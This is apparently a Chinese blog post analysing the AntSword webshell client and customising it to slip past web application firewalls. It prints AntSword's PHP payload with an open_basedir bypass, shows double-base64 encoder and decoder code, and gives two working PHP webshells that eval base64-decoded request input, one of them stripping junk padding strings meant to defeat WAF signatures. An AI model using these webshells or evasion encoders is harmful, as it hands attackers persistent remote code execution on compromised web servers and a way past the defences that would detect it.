蚁剑工作机制分析与改造

概述

总体从四个角度了解蚁剑工作机制

1. 蚁剑发送的payload
2. 解码器
3. 编码器
4. 请求包中的所有参数

蚁剑发送的payload

随机数字作为分界符,

发送前蚁剑客户端已生成

接收响应包时自动剔除

作用 : 防waf定位解码

主要函数:

• asenc()

$out是输出,传递$out是为了给输出编码,通过return传递给asoutput()函数

• asoutput()

通过$output = ob_get_contents(), 从缓冲区获取payload执行后的数据,经过asenc()编码然后输出

什么时候数据跑到缓冲区?

53行,ob_start();,打开缓冲区

77行:echo $M . $L;,将payload执行后的数据输出至缓冲区

该payload是目录获取payload,最后的$M.$L便是payload的执行结果

以下是payload代码

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
 
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
 
    @array_push($oparr, $ocwd, sys_get_temp_dir());
 
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        }
 
        $tmdir = $item . "/.bb5712d7460";
        @mkdir($tmdir);
 
        if (!@file_exists($tmdir)) {
            continue;
        }
 
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
 
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        }
 
        @ini_set("open_basedir", " /");
        @rmdir($tmdir);
        break;
    }
}
 
function asenc($out)
{
    return $out;
}
 
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "b031" . "2f345";
    echo @asenc($output);
    echo "594e" . "e92a";
}
 
ob_start();
 
try {
    $D = base64_decode(substr($_POST["e17bb804eeb883"], 2));
    $F = @opendir($D);
 
    if ($F == NULL) {
        echo("ERROR:// Path Not Found Or No Permission!");
    } else {
        $M = NULL;
        $L = NULL;
 
        while ($N = @readdir($F)) {
            $P = $D . $N;
            $T = @date("Y-m-d H:i:s", @filemtime($P));
            @$E = substr(base_convert(@fileperms($P), 10, 8), -4);
            $R = "    " . $T . " " . @filesize($P) . " " . $E . " ";
 
            if (@is_dir($P))
                $M .= $N . " /" . $R;
            else
                $L .= $N . $R;
        }
 
        echo $M . $L;
        @closedir($F);
    }
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
}
 
asoutput();
die();

解码器

双base64关键部分源码:

  asoutput: () => {
    return `function asenc($out){
      return @base64_encode(base64_encode($out));
    }
    `.replace(/\n\s+/g, '');
  },
 
  decode_buff: (data, ext={}) => {
    var fir_de_data = Buffer.from(data.toString(), 'base64');
    var sec_de_data = Buffer.from(fir_de_data.toString(),'base64');
    
    return sec_de_data;

要注意的问题:

data中包含经过编码后的数据,

最终要解码并写入buffer对象中

tostring是让被解码后的二进制数据以字符串的形式表示好进行二次处理

两个重要函数:

• asoutput
• decode_buff

编码器

无论什么加密方式,都要传输两个变量给shell

• data['rondomID']
• data['pwd']

data['rondomID']中存储的是payload,需要对它进行编码或加密

data['pwd']中存储的是解密方法

也就是说,webshell中不含任何解密方法,加密payload和解密函数,都靠蚁剑将两者打包成参数进行发送

所以,如果要简单修改成双base64,主要修改这两个参数的值

请求包中的所有参数

并非所有参数都经过加密

比如传payload之前传的包含解密方法参数$_POST['cmd']

该步骤,只能webshell配合,也就是在webshell中把解码方法写上

蚁剑又是发送加密payload又是发送包含明文解密函数的参数,如果再对该参数进行加密,只有webshell完成该解密工作了

可采用的方法思路:

• 添加随机前缀后缀,模仿蚁剑返回包机制
• 进行编码或加密(冰蝎的AES加密,直接把密钥写webshell代码上,两个风险,1.密钥固定导致固定步骤经过加密的payload的密文都是一样的,2.密钥太容易泄露)

上代码

这样,不仅payload进行了处理,cmd参数也进行了处理,效果图如下:

成果:$cmd参数成功加密,webshell成功处理返回.

但对于的,webshell要加个base64解密

<?php @eval(base64_decode($_REQUEST['cmd'])); ?>

或者,你可以采用添加随机前缀,就像经过解码器处理的返回包中一样.

要实现这个,需要对编码器和webshell进行小修改

<?php 
    $st = $_REQUEST['cmd']; 
    $sy = str_replace('npbsgsb','',$st); 
    $su = str_replace('xnzydsb,wndsg','',$sy); 
    @eval(base64_decode($su)); 
?>

效果图如下:

参考链接:

蚁剑自定义编码器和解码器来bypass waf - darkless

WAF拦了蚁剑发送的其它参数时怎么操作

如果不了解基本的给蚁剑设置代理,改useragent,referer等字段,蚁剑自带编码解码器分析,可参考:

对蚁剑的相关改造及分析-安全客 - 安全资讯平台